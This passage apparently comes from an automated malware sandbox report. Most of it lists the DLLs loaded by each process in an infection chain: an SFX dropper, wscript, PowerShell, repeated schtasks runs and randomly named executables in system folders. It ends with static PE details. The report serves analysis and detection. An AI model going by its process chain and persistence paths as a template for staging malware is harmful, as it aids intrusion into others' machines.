                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: version.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: slc.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: ktmw32.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: textshaping.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: textinputframework.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: coreuicomponents.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: coremessaging.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: ntmarta.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: coremessaging.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic file information: File size 6701051 > 1048576
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
